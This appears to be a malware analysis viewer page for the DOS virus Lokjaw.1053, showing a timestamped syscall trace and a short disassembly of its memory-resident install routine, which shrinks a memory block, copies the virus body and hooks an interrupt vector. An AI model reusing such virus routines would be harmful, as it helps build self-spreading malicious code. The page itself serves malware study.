Sample viewer

vx.netlux.org/Virus.DOS.Lokjaw.1053

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:27.037494593Z 44 PC: 12aa9 | Get time 0x12aa9: cmp ax, 0xdcd
0x12aac: je 0x12b09
0x12aae: mov ax, cs
0x12ab0: dec ax
0x12ab1: mov ds, ax
0x12ab3: cmp byte ptr [0], 0x5a
0x12ab8: jne 0x12b01
0x12aba: mov ax, word ptr [3]
0x12abd: sub ax, 0x100
0x12ac0: mov word ptr [3], ax
0x12ac3: mov bx, ax
0x12ac5: mov ax, es
0x12ac7: add ax, bx
0x12ac9: mov es, ax
0x12acb: mov cx, 0x41d
0x12ace: mov ax, ds
0x12ad0: inc ax
0x12ad1: mov ds, ax
0x12ad3: lea si, word ptr [bp + 0x106]
0x12ad7: mov di, 0x100
2018-12-17T22:56:27.039793103Z 53 PC: 12aeb | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:56:27.040886307Z 37 PC: 12b00 | Set interrupt vector (Interrupt = '33' AKA 'Random read')